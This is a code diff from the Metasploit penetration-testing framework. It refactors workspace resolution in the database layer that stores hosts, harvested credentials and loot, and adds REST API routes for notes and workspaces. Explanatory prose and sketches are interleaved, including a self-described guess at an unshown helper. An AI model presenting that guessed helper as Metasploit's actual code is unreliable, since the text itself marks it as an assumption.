-    @current_workspace_name = workspace.name
+    # The @current_workspace is tracked on the client side, so attempting to call it directly from the RemoteDataService
+    # will not return the correct results. Run it back through the proxy.
+    wlog "[DEPRECATION] Setting the current workspace from the RemoteDataService is no longer supported. Please call from WorkspaceDataProxy instead."
+    caller.each { |line| wlog "#{line}"}
+    framework.db.workspace = workspace
   end
 
-  def workspaces
-    json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, {:all => true}), WORKSPACE_MDM_CLASS, [])
+  def workspaces(opts)
+    json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, nil, opts), WORKSPACE_MDM_CLASS, [])
   end
 
-  def workspace_associations_counts()
-    json_to_mdm_object(self.get_data(WORKSPACE_COUNTS_API_PATH, []), WORKSPACE_MDM_CLASS, [])
+  def delete_workspaces(opts)
+    json_to_mdm_object(self.delete_data(WORKSPACE_API_PATH, opts), WORKSPACE_MDM_CLASS, [])
   end
 
-  #########
-  protected
-  #########
-
-  def workspace_cache
-    @workspace_cache ||= {}
-  end
-
-  def current_workspace_name
-    @current_workspace_name ||= DEFAULT_WORKSPACE_NAME
-  end
-
+  def update_workspace(opts)
+    path = WORKSPACE_API_PATH
+    if opts && opts[:id]
+      id = opts.delete(:id)
+      path = "#{WORKSPACE_API_PATH}/#{id}"
+    end
+    json_to_mdm_object(self.put_data(path, opts), WORKSPACE_MDM_CLASS, []).first
+  end
 end
@@ -1,7 +1,19 @@
 module NoteDataService
 
+  def notes(opts)
+    raise NotImplementedError, 'NoteDataService#notes is not implemented'
+  end
+
   def report_note(opts)
-    raise 'NoteDataService#report_note is not implemented'
+    raise NotImplementedError, 'NoteDataService#report_note is not implemented'
+  end
+
+  def update_note(opts)
+    raise NotImplementedError, 'NoteDataService#update_note is not implemented'
+  end
+
+  def delete_note(opts)
+    raise NotImplementedError, 'NoteDataService#delete_note is not implemented'
   end
 
 end
@@ -27,9 +27,4 @@ module WorkspaceDataService
   def workspace_associations_counts()
     raise 'WorkspaceDataService#workspace_associations_counts is not implemented'
   end
 
-  def rename_workspace(from_name, to_name)
-    raise 'WorkspaceDataService#rename_workspace is not implemented'
-  end
-
 end
@@ -98,6 +98,11 @@ module Exploit
     # best encoder.
     exploit.datastore['ENCODER'] = opts['Encoder'] if opts['Encoder']
 
+    # Use the supplied NOP generator, if any. If one was not specified, then
+    # nil will be assigned causing the exploit to default to picking a
+    # compatible NOP generator.
+    exploit.datastore['NOP'] = opts['Nop'] if opts['Nop']
+
     # Force the payload to share the exploit's datastore
     driver.payload.share_datastore(driver.exploit.datastore)
 
@@ -16,9 +16,6 @@ module Msf::DBManager::Connection
     begin
       # Migrate the database, if needed
       migrate
 
-      # Set the default workspace
-      self.workspace = self.default_workspace
     rescue ::Exception => exception
       self.error = exception
       elog("DB.connect threw an exception: #{exception}")
@@ -2,8 +2,9 @@ module Msf::DBManager::Cred
   # This methods returns a list of all credentials in the database
   def creds(opts)
     query = nil
+    wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
     ::ActiveRecord::Base.connection_pool.with_connection {
-      query = Metasploit::Credential::Core.where( workspace_id: framework.db.workspace.id )
+      query = Metasploit::Credential::Core.where( workspace_id: wspace.id )
       query = query.includes(:private, :public, :logins).references(:private, :public, :logins)
       query = query.includes(logins: [ :service, { service: :host } ])
 
@@ -40,7 +41,7 @@ module Msf::DBManager::Cred
 
   # This method iterates the creds table calling the supplied block with the
   # cred instance of each entry.
-  def each_cred(wspace=workspace,&block)
+  def each_cred(wspace=framework.db.workspace,&block)
     ::ActiveRecord::Base.connection_pool.with_connection {
       wspace.creds.each do |cred|
         block.call(cred)
@@ -106,7 +107,7 @@ module Msf::DBManager::Cred
     # Nil is true for active.
     active = (opts[:active] || opts[:active].nil?) ? true : false
 
-    wspace = opts.delete(:workspace) || workspace
+    wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
 
     # Service management; assume the user knows what
     # he's talking about.
@@ -2,7 +2,8 @@ require 'msf/core/db_export'
 
 module Msf::DBManager::DbExport
   def run_db_export(opts)
-    exporter = Msf::DBManager::Export.new(framework.db.workspace)
+    wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
+    exporter = Msf::DBManager::Export.new(wspace)
 
     output_file = exporter.send("to_#{opts[:format]}_file".intern, opts[:path]) do |mtype, mstatus, mname|
       if mtype == :status
@@ -8,7 +8,7 @@ module Msf::DBManager::Event
   def report_event(opts = {})
     return if not active
     ::ActiveRecord::Base.connection_pool.with_connection {
-      wspace = get_workspace(opts)
+      wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
       return if not wspace # Temp fix?
       uname = opts.delete(:username)
 
@@ -36,7 +36,7 @@ module Msf::DBManager::ExploitAttempt
     return unless opts.has_key?(:refs) && !opts[:refs].blank?
     host = opts[:host] || return
 
-    wspace = opts[:workspace] || workspace
+    wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
     port = opts[:port]
     prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
     svc = opts[:service]
@@ -73,7 +73,7 @@ module Msf::DBManager::ExploitAttempt
     return unless opts[:refs]
     host = opts[:host] || return
 
-    wspace = opts[:workspace] || workspace
+    wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
     port = opts[:port]
     prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
     svc = opts[:service]
@@ -222,7 +222,7 @@ module Msf::DBManager::ExploitAttempt
   # @option opts [String] :username
   # @return [ MetasploitDataModels::AutomaticExploitation::Match, MetasploitDataModels::AutomaticExploitation::Run]
   def create_match_for_vuln(vuln,opts)
-    wspace = opts[:workspace] || workspace
+    wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
     run = opts[:run]
     module_fullname = opts[:module]
 
@@ -1,5 +1,5 @@
 module Msf::DBManager::ExploitedHost
-  def each_exploited_host(wspace=workspace,&block)
+  def each_exploited_host(wspace=framework.db.workspace,&block)
     ::ActiveRecord::Base.connection_pool.with_connection {
       wspace.exploited_hosts.each do |eh|
         block.call(eh)
@@ -8,7 +8,7 @@ module Msf::DBManager::ExploitedHost
   end
 
   # This method returns a list of all exploited hosts in the database.
-  def exploited_hosts(wspace=workspace)
+  def exploited_hosts(wspace=framework.db.workspace)
     ::ActiveRecord::Base.connection_pool.with_connection {
       wspace.exploited_hosts
     }
@@ -36,7 +36,7 @@ module Msf::DBManager::Host
   # Iterates over the hosts table calling the supplied block with the host
   # instance of each entry.
   #
-  def each_host(wspace=workspace, &block)
+  def each_host(wspace=framework.db.workspace, &block)
     ::ActiveRecord::Base.connection_pool.with_connection {
       wspace.hosts.each do |host|
         block.call(host)
@@ -53,17 +53,14 @@ module Msf::DBManager::Host
   end

   def add_host_tag(opts)
-    workspace = opts[:workspace]
-    if workspace.kind_of? String
-      workspace = find_workspace(workspace)
-    end
+    wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)

     ip = opts[:ip]
     tag_name = opts[:tag_name]

-    host = framework.db.get_host(:workspace => workspace, :address => ip)
+    host = framework.db.get_host(:workspace => wspace, :address => ip)
     if host
-      possible_tags = Mdm::Tag.joins(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", workspace.id, ip, tag_name).order("tags.id DESC").limit(1)
+      possible_tags = Mdm::Tag.joins(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", wspace.id, ip, tag_name).order("tags.id DESC").limit(1)
       tag = (possible_tags.blank? ? Mdm::Tag.new : possible_tags.first)
       tag.name = tag_name
       tag.hosts = [host]
@@ -74,7 +71,7 @@ module Msf::DBManager::Host
   def delete_host_tag(opts)
     workspace = opts[:workspace]
     if workspace.kind_of? String
-      workspace = find_workspace(workspace)
+      workspace = framework.db.find_workspace(workspace)
     end

     ip = opts[:rws]
@@ -113,10 +110,7 @@ module Msf::DBManager::Host
       return address if address.kind_of? ::Mdm::Host
     end
     ::ActiveRecord::Base.connection_pool.with_connection {
-      wspace = opts.delete(:workspace) || workspace
-      if wspace.kind_of? String
-        wspace = find_workspace(wspace)
-      end
+      wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)

       address = Msf::Util::Host.normalize_host(address)
       return wspace.hosts.find_by_address(address)
@@ -133,12 +127,8 @@ module Msf::DBManager::Host

   # Returns a list of all hosts in the database
   def hosts(opts)
-    wspace = opts[:workspace] || opts[:wspace] || workspace
-    if wspace.kind_of? String
-      wspace = find_workspace(wspace)
-    end
-
     ::ActiveRecord::Base.connection_pool.with_connection {
+      wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
+
       conditions = {}
       conditions[:state] = [Msf::HostState::Alive, Msf::HostState::Unknown] if opts[:non_dead]
@@ -193,10 +183,7 @@ module Msf::DBManager::Host
   end

     ::ActiveRecord::Base.connection_pool.with_connection {
-      wspace = opts.delete(:workspace) || workspace
-      if wspace.kind_of? String
-        wspace = find_workspace(wspace)
-      end
+      wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)

       ret = { }

@@ -280,14 +267,11 @@ module Msf::DBManager::Host
   end

   def update_host(opts)
-    # process workspace string for update if included in opts
-    wspace = opts.delete(:workspace)
-    if wspace.kind_of? String
-      wspace = find_workspace(wspace)
-      opts[:workspace] = wspace
-    end
-
     ::ActiveRecord::Base.connection_pool.with_connection {
+      # process workspace string for update if included in opts
+      wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
+      opts[:workspace] = wspace if wspace
+
       id = opts.delete(:id)
       Mdm::Host.update(id, opts)
     }
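All of these call sites now delegate workspace resolution to `Msf::Util::DBManager.process_opts_workspace`. The helper's body is not part of this diff, so the following is only a rough sketch of the behavior the sites above appear to rely on (the parameter name `use_default` and the exact fallback rules are assumptions): it pulls the workspace out of `opts`, resolves a name to an `Mdm::Workspace`, and falls back to the current workspace unless the caller passes `false`, as `update_host` does.

```ruby
# Hypothetical sketch only -- not the actual Metasploit implementation.
module Msf
  module Util
    module DBManager
      # opts        : options hash whose :workspace / :wspace entry is consumed
      # framework   : Msf::Framework instance used to resolve names and defaults
      # use_default : when false (see update_host above), no fallback is applied
      def self.process_opts_workspace(opts, framework, use_default = true)
        wspace = opts.delete(:workspace) || opts.delete(:wspace)
        wspace = framework.db.find_workspace(wspace) if wspace.kind_of?(String)
        wspace || (framework.db.workspace if use_default)
      end
    end
  end
end
```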
@ -299,115 +283,4 @@ module Msf::DBManager::Host
|
||||||
return [] if flavor_match.nil?
|
return [] if flavor_match.nil?
|
||||||
["Windows", flavor_match.captures.first]
|
["Windows", flavor_match.captures.first]
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Update a host's attributes via semi-standardized sysinfo hash (Meterpreter)
|
|
||||||
#
|
|
||||||
# The opts parameter MUST contain the following entries
|
|
||||||
# +:host+:: -- the host's ip address
|
|
||||||
# +:info+:: -- the information hash
|
|
||||||
# * 'Computer' -- the host name
|
|
||||||
# * 'OS' -- the operating system string
|
|
||||||
# * 'Architecture' -- the hardware architecture
|
|
||||||
# * 'System Language' -- the system language
|
|
||||||
#
|
|
||||||
# The opts parameter can contain:
|
|
||||||
# +:workspace+:: -- the workspace for this host
|
|
||||||
#
|
|
||||||
def update_host_via_sysinfo(opts)
|
|
||||||
|
|
||||||
return if !active
|
|
||||||
addr = opts.delete(:host) || return
|
|
||||||
info = opts.delete(:info) || return
|
|
||||||
|
|
||||||
# Sometimes a host setup through a pivot will see the address as "Remote Pipe"
|
|
||||||
if addr.eql? "Remote Pipe"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
|
||||||
wspace = opts.delete(:workspace) || workspace
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
if !addr.kind_of? ::Mdm::Host
|
|
||||||
addr = Msf::Util::Host.normalize_host(addr)
|
|
||||||
addr, scope = addr.split('%', 2)
|
|
||||||
opts[:scope] = scope if scope
|
|
||||||
|
|
||||||
unless ipv46_validator(addr)
|
|
||||||
raise ::ArgumentError, "Invalid IP address in report_host(): #{addr}"
|
|
||||||
end
|
|
||||||
|
|
||||||
if opts[:comm] and opts[:comm].length > 0
|
|
||||||
host = wspace.hosts.where(address: addr, comm: opts[:comm]).first_or_initialize
|
|
||||||
else
|
|
||||||
host = wspace.hosts.where(address: addr).first_or_initialize
|
|
||||||
end
|
|
||||||
else
|
|
||||||
host = addr
|
|
||||||
end
|
|
||||||
|
|
||||||
ostate = host.state
|
|
||||||
|
|
||||||
res = {}
|
|
||||||
|
|
||||||
if info['Computer']
|
|
||||||
res[:name] = info['Computer']
|
|
||||||
end
|
|
||||||
|
|
||||||
if info['Architecture']
|
|
||||||
res[:arch] = info['Architecture'].split(/\s+/).first
|
|
||||||
end
|
|
||||||
|
|
||||||
if info['OS'] =~ /^Windows\s*([^\(]+)\(([^\)]+)\)/i
|
|
||||||
res[:os_name] = "Windows"
|
|
||||||
res[:os_flavor] = $1.strip
|
|
||||||
build = $2.strip
|
|
||||||
|
|
||||||
if build =~ /Service Pack (\d+)/
|
|
||||||
res[:os_sp] = "SP" + $1
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
if info["System Language"]
|
|
||||||
case info["System Language"]
|
|
||||||
when /^en_/
|
|
||||||
res[:os_lang] = "English"
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
# Truncate the info field at the maximum field length
|
|
||||||
if res[:info]
|
|
||||||
res[:info] = res[:info][0,65535]
|
|
||||||
end
|
|
||||||
|
|
||||||
# Truncate the name field at the maximum field length
|
|
||||||
if res[:name]
|
|
||||||
res[:name] = res[:name][0,255]
|
|
||||||
end
|
|
||||||
|
|
||||||
res.each do |k,v|
|
|
||||||
if (host.attribute_names.include?(k.to_s))
|
|
||||||
unless host.attribute_locked?(k.to_s)
|
|
||||||
host[k] = v.to_s.gsub(/[\x00-\x1f]/n, '')
|
|
||||||
end
|
|
||||||
elsif !v.blank?
|
|
||||||
dlog("Unknown attribute for Host: #{k}")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
# Set default fields if needed
|
|
||||||
host.state = Msf::HostState::Alive if !host.state
|
|
||||||
host.comm = '' if !host.comm
|
|
||||||
host.workspace = wspace if !host.workspace
|
|
||||||
|
|
||||||
host.save! if host.changed?
|
|
||||||
host_state_changed(host, ostate) if host.state != ostate
|
|
||||||
|
|
||||||
host
|
|
||||||
}
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@@ -6,13 +6,9 @@ module Msf::DBManager::HostTag
     raise Msf::DBImportError.new("Missing required option :name") unless name
     addr = opts.delete(:addr)
     raise Msf::DBImportError.new("Missing required option :addr") unless addr
-    wspace = opts.delete(:wspace)
-    raise Msf::DBImportError.new("Missing required option :wspace") unless wspace
     ::ActiveRecord::Base.connection_pool.with_connection {
-      if wspace.kind_of? String
-        wspace = find_workspace(wspace)
-      end
+      wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
+      raise Msf::DBImportError.new("Missing required option :wspace") unless wspace

       host = nil
       report_host(:workspace => wspace, :address => addr)
@@ -23,7 +23,8 @@ module HostServlet
     lambda {
       begin
         opts = parse_json_request(request, false)
-        data = get_db().hosts(params.symbolize_keys)
+        sanitized_params = sanitize_params(params)
+        data = get_db.hosts(sanitized_params)
         includes = [:loots]
         set_json_response(data, includes)
       rescue Exception => e
@@ -36,7 +37,7 @@ module HostServlet
     lambda {
       begin
         job = lambda { |opts|
-          data = get_db().report_host(opts)
+          data = get_db.report_host(opts)
         }
         exec_report_job(request, &job)
       rescue Exception => e
@@ -49,9 +50,9 @@ module HostServlet
     lambda {
       begin
         opts = parse_json_request(request, false)
-        tmp_params = params.symbolize_keys
+        tmp_params = sanitize_params(params)
         opts[:id] = tmp_params[:id] if tmp_params[:id]
-        data = get_db().update_host(opts)
+        data = get_db.update_host(opts)
         set_json_response(data)
       rescue Exception => e
         set_error_on_response(e)
@@ -63,7 +64,7 @@ module HostServlet
     lambda {
       begin
         opts = parse_json_request(request, false)
-        data = get_db().delete_host(opts)
+        data = get_db.delete_host(opts)
         set_json_response(data)
       rescue Exception => e
         set_error_on_response(e)
@@ -23,7 +23,8 @@ module LootServlet
     lambda {
       begin
         opts = parse_json_request(request, false)
-        data = get_db().loots(params.symbolize_keys)
+        sanitized_params = sanitize_params(params)
+        data = get_db.loots(sanitized_params)
         includes = [:host]
         data.each do |loot|
           loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
@@ -45,7 +46,7 @@ module LootServlet
             opts[:data] = Base64.urlsafe_decode64(opts[:data])
           end

-          get_db().report_loot(opts)
+          get_db.report_loot(opts)
         }
         exec_report_job(request, &job)
     }
@@ -55,9 +56,9 @@ module LootServlet
     lambda {
       begin
         opts = parse_json_request(request, false)
-        tmp_params = params.symbolize_keys
+        tmp_params = sanitize_params(params)
         opts[:id] = tmp_params[:id] if tmp_params[:id]
-        data = get_db().update_loot(opts)
+        data = get_db.update_loot(opts)
         set_json_response(data)
       rescue Exception => e
         set_error_on_response(e)
@@ -69,7 +70,7 @@ module LootServlet
     lambda {
       begin
         opts = parse_json_request(request, false)
-        data = get_db().delete_loot(opts)
+        data = get_db.delete_loot(opts)
         set_json_response(data)
       rescue Exception => e
         set_error_on_response(e)
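Because the loot listing endpoint Base64-encodes binary loot data before serializing it (note the `Base64.urlsafe_encode64` call above), an API consumer has to reverse that step on its side. A small client-side sketch; the endpoint path and the `data` field name are taken from the servlet code above, everything else is illustrative:

```ruby
require 'base64'
require 'json'

# Assumes a JSON array of loot records as returned by GET /api/v1/loots,
# each carrying a urlsafe-Base64 "data" field as produced by LootServlet above.
def decode_loot_payloads(json_body)
  JSON.parse(json_body).map do |loot|
    loot['data'] = Base64.urlsafe_decode64(loot['data']) if loot['data']
    loot
  end
end
```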
@@ -4,18 +4,71 @@ module NoteServlet
     '/api/v1/notes'
   end

+  def self.api_path_with_id
+    "#{NoteServlet.api_path}/?:id?"
+  end
+
   def self.registered(app)
+    app.get NoteServlet.api_path_with_id, &get_note
     app.post NoteServlet.api_path, &report_note
+    app.put NoteServlet.api_path_with_id, &update_note
+    app.delete NoteServlet.api_path, &delete_note
   end

   #######
   private
   #######

+  def self.get_note
+    lambda {
+      begin
+        opts = parse_json_request(request, false)
+        sanitized_params = sanitize_params(params)
+        data = get_db.notes(sanitized_params)
+        includes = [:host]
+        set_json_response(data, includes)
+      rescue Exception => e
+        set_error_on_response(e)
+      end
+    }
+  end
+
   def self.report_note
     lambda {
-      job = lambda { |opts| get_db().report_note(opts) }
+      begin
+        job = lambda { |opts|
+          get_db.report_note(opts)
+        }
         exec_report_job(request, &job)
+      rescue Exception => e
+        set_error_on_response(e)
+      end
+    }
+  end
+
+  def self.update_note
+    lambda {
+      begin
+        opts = parse_json_request(request, false)
+        tmp_params = sanitize_params(params)
+        opts[:id] = tmp_params[:id] if tmp_params[:id]
+        data = get_db.update_note(opts)
+        set_json_response(data)
+      rescue Exception => e
+        set_error_on_response(e)
+      end
+    }
+  end
+
+  def self.delete_note
+    lambda {
+      begin
+        opts = parse_json_request(request, false)
+        data = get_db.delete_note(opts)
+        set_json_response(data)
+      rescue Exception => e
+        set_error_on_response(e)
+      end
     }
   end
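With the extra routes registered above, notes gain read, update, and delete over the REST API in addition to the existing report endpoint. A hedged client sketch using Net::HTTP; only the `/api/v1/notes` paths and the `:id` route parameter come from the servlet above, while the host, port, and JSON field names are assumptions:

```ruby
require 'net/http'
require 'json'

base = URI('http://127.0.0.1:8080/api/v1/notes') # assumed host and port

# List notes (GET /api/v1/notes)
notes = JSON.parse(Net::HTTP.get(base))

# Update note 1 (PUT /api/v1/notes/1); the body fields are illustrative only
put = Net::HTTP::Put.new(URI("#{base}/1"), 'Content-Type' => 'application/json')
put.body = { data: 'updated note text' }.to_json

Net::HTTP.start(base.host, base.port) { |http| puts http.request(put).code }
```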
@@ -22,7 +22,7 @@ module ServiceServlet
   def self.get_services
     lambda {
       begin
-        opts = params.symbolize_keys
+        opts = sanitize_params(params)
         data = get_db.services(opts)
         includes = [:host]
         set_json_response(data, includes)
@@ -44,7 +44,7 @@ module ServiceServlet
     lambda {
       begin
         opts = parse_json_request(request, false)
-        tmp_params = params.symbolize_keys
+        tmp_params = sanitize_params(params)
         opts[:id] = tmp_params[:id] if tmp_params[:id]
         data = get_db.update_service(opts)
         set_json_response(data)
@@ -34,7 +34,8 @@ module VulnAttemptServlet
       begin
         job = lambda { |opts|
           vuln_id = opts.delete(:vuln_id)
-          vuln = get_db.vulns(id: vuln_id).first
+          wspace = opts.delete(:workspace)
+          vuln = get_db.vulns(id: vuln_id, workspace: wspace).first
           get_db.report_vuln_attempt(vuln, opts)
         }
         exec_report_job(request, &job)
@@ -23,7 +23,8 @@ module VulnServlet
     lambda {
       begin
         opts = parse_json_request(request, false)
-        data = get_db.vulns(params.symbolize_keys)
+        sanitized_params = sanitize_params(params)
+        data = get_db.vulns(sanitized_params)
         includes = [:host, :vulns_refs, :refs, :module_refs]
         set_json_response(data, includes)
       rescue Exception => e
@@ -49,7 +50,7 @@ module VulnServlet
     lambda {
       begin
         opts = parse_json_request(request, false)
-        tmp_params = params.symbolize_keys
+        tmp_params = sanitize_params(params)
         opts[:id] = tmp_params[:id] if tmp_params[:id]
         data = get_db.update_vuln(opts)
         set_json_response(data)
@@ -4,10 +4,15 @@ module WorkspaceServlet
     '/api/v1/workspaces'
   end

+  def self.api_path_with_id
+    "#{WorkspaceServlet.api_path}/?:id?"
+  end
+
   def self.registered(app)
-    app.get WorkspaceServlet.api_path, &get_workspace
-    app.get WorkspaceServlet.api_path + '/counts', &get_workspace_counts
+    app.get WorkspaceServlet.api_path_with_id, &get_workspace
     app.post WorkspaceServlet.api_path, &add_workspace
+    app.put WorkspaceServlet.api_path_with_id, &update_workspace
+    app.delete WorkspaceServlet.api_path, &delete_workspace
   end

   #######
@@ -17,14 +22,10 @@ module WorkspaceServlet
   def self.get_workspace
     lambda {
       begin
-        opts = parse_json_request(request, true)
+        opts = parse_json_request(request, false)
         includes = nil
-        if (opts[:all])
-          data = get_db().workspaces
-          #includes = 'hosts: {only: :count}, services: {only: :count}, vulns: {only: :count}, creds: {only: :count}, loots: {only: :count}, notes: {only: :count}'
-        else
-          data = get_db().find_workspace(opts[:workspace_name])
-        end
+        sanitized_params = sanitize_params(params)
+        data = get_db.workspaces(sanitized_params)

         set_json_response(data, includes)
       rescue Exception => e
@@ -33,25 +34,41 @@ module WorkspaceServlet
     }
   end

-  def self.get_workspace_counts
-    lambda {
-      begin
-        set_json_response(get_db().workspace_associations_counts)
-      rescue Exception => e
-        set_error_on_response(e)
-      end
-    }
-  end
-
   def self.add_workspace
     lambda {
       begin
         opts = parse_json_request(request, true)
-        workspace = get_db().add_workspace(opts[:workspace_name])
+        workspace = get_db.add_workspace(opts)
         set_json_response(workspace)
       rescue Exception => e
         set_error_on_response(e)
       end
     }
   end

+  def self.update_workspace
+    lambda {
+      begin
+        opts = parse_json_request(request, false)
+        tmp_params = sanitize_params(params)
+        opts[:id] = tmp_params[:id] if tmp_params[:id]
+        data = get_db.update_workspace(opts)
+        set_json_response(data)
+      rescue Exception => e
+        set_error_on_response(e)
+      end
+    }
+  end
+
+  def self.delete_workspace
+    lambda {
+      begin
+        opts = parse_json_request(request, false)
+        data = get_db.delete_workspaces(opts)
+        set_json_response(data)
+      rescue Exception => e
+        set_error_on_response(e)
+      end
+    }
+  end
 end
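The servlet now forwards the full JSON body to the DBManager calls, which have changed shape as well: `add_workspace` takes an options hash rather than a bare name, `update_workspace` keys off an `:id`, and `delete_workspaces` expects an `:ids` array. A hedged sketch of driving the same operations directly through the DBManager API the servlet wraps; `framework` is assumed to be a live `Msf::Framework`, and the workspace names are placeholders:

```ruby
# Options hashes mirror what the servlet above forwards from the JSON body.
ws = framework.db.add_workspace(name: 'client-engagement')    # opts hash, not a bare string
framework.db.update_workspace(id: ws.id, name: 'client-eng')  # rename via :id plus new attributes
framework.db.delete_workspaces(ids: [ws.id])                  # delete takes an :ids array
```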
@@ -12,7 +12,7 @@ module ServletHelper
     [500, headers, error.message]
   end

-  def set_empty_response()
+  def set_empty_response
     [200, '']
   end

@@ -41,7 +41,7 @@ module ServletHelper
     exec_async = opts.delete(:exec_async)
     if (exec_async)
       JobProcessor.instance.submit_job(opts, &job)
-      return set_empty_response()
+      return set_empty_response
     else
       data = job.call(opts)
       return set_json_response(data, includes)
@@ -52,10 +52,19 @@ module ServletHelper
     end
   end

-  def get_db()
+  def get_db
     DBManagerProxy.instance.db
   end

+  # Sinatra injects extra parameters for some reason: https://github.com/sinatra/sinatra/issues/453
+  # This method cleans those up so we don't have any unexpected values before passing on.
+  #
+  # @param [Hash] params Hash containing the parameters for the request.
+  # @return [Hash] Returns params with symbolized keys and the injected parameters removed.
+  def sanitize_params(params)
+    params.symbolize_keys.except(:captures, :splat)
+  end
+
   #######
   private
   #######
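The reason every servlet now routes its `params` through `sanitize_params` is that Sinatra merges route-matching artifacts (`captures`, `splat`) into the params hash; passing those straight into an ActiveRecord `where` would raise. A quick illustration of what the helper strips; the raw params hash below is representative, not captured from a real request:

```ruby
require 'active_support/core_ext/hash' # provides Hash#symbolize_keys / #except

# Roughly what Sinatra hands a route like GET /api/v1/hosts/?:id?
raw_params = { 'id' => '3', 'captures' => ['3'], 'splat' => [] }

clean = raw_params.symbolize_keys.except(:captures, :splat)
# => { id: "3" }  -- safe to forward to get_db.hosts(clean)
```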
@@ -16,7 +16,7 @@ module Msf::DBManager::Import::Nmap
   # that. Otherwise, you'll hit the old NmapXMLStreamParser.
   def import_nmap_xml(args={}, &block)
     return nil if args[:data].nil? or args[:data].empty?
-    wspace = args[:wspace] || workspace
+    wspace = Msf::Util::DBManager.process_opts_workspace(args, framework)
     bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []

     if Rex::Parser.nokogiri_loaded
@@ -241,7 +241,6 @@ module Msf::DBManager::Import::Nmap
   #
   def import_nmap_xml_file(args={})
     filename = args[:filename]
-    wspace = args[:wspace] || workspace

     data = ""
     ::File.open(filename, 'rb') do |f|
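Since the `:wspace` fallback is removed from `import_nmap_xml_file`, callers that relied on the implicit current workspace should pass one explicitly and let `process_opts_workspace` resolve it (or fall back to the default). A hedged call sketch; the file path and workspace name are placeholders, and `:workspace` as the option key is an assumption based on the other call sites in this diff:

```ruby
# Illustrative only: path and workspace name are placeholders.
framework.db.import_nmap_xml_file(
  filename:  '/tmp/scan.xml',
  workspace: 'client-engagement'   # resolved via process_opts_workspace
)
```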
@ -1,19 +1,4 @@
|
||||||
module Msf::DBManager::Loot
|
module Msf::DBManager::Loot
|
||||||
#
|
|
||||||
# Loot collection
|
|
||||||
#
|
|
||||||
#
|
|
||||||
# This method iterates the loot table calling the supplied block with the
|
|
||||||
# instance of each entry.
|
|
||||||
#
|
|
||||||
def each_loot(wspace=workspace, &block)
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
|
||||||
wspace.loots.each do |note|
|
|
||||||
block.call(note)
|
|
||||||
end
|
|
||||||
}
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Find or create a loot matching this type/data
|
# Find or create a loot matching this type/data
|
||||||
#
|
#
|
||||||
|
@ -25,14 +10,12 @@ module Msf::DBManager::Loot
|
||||||
# This methods returns a list of all loot in the database
|
# This methods returns a list of all loot in the database
|
||||||
#
|
#
|
||||||
def loots(opts)
|
def loots(opts)
|
||||||
wspace = opts.delete(:workspace) || opts.delete(:wspace) || workspace
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
opts[:workspace_id] = wspace.id
|
|
||||||
search_term = opts.delete(:search_term)
|
search_term = opts.delete(:search_term)
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
opts[:workspace_id] = wspace.id
|
||||||
|
|
||||||
if search_term && !search_term.empty?
|
if search_term && !search_term.empty?
|
||||||
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::Loot, search_term)
|
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::Loot, search_term)
|
||||||
Mdm::Loot.includes(:host).where(opts).where(column_search_conditions)
|
Mdm::Loot.includes(:host).where(opts).where(column_search_conditions)
|
||||||
|
@ -46,10 +29,7 @@ module Msf::DBManager::Loot
|
||||||
def report_loot(opts)
|
def report_loot(opts)
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
path = opts.delete(:path) || (raise RuntimeError, "A loot :path is required")
|
path = opts.delete(:path) || (raise RuntimeError, "A loot :path is required")
|
||||||
|
|
||||||
host = nil
|
host = nil
|
||||||
|
@ -101,13 +81,10 @@ module Msf::DBManager::Loot
|
||||||
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
||||||
# @return [Mdm::Loot] The updated Mdm::Loot object.
|
# @return [Mdm::Loot] The updated Mdm::Loot object.
|
||||||
def update_loot(opts)
|
def update_loot(opts)
|
||||||
wspace = opts.delete(:workspace)
|
|
||||||
if wspace.kind_of? String
|
|
||||||
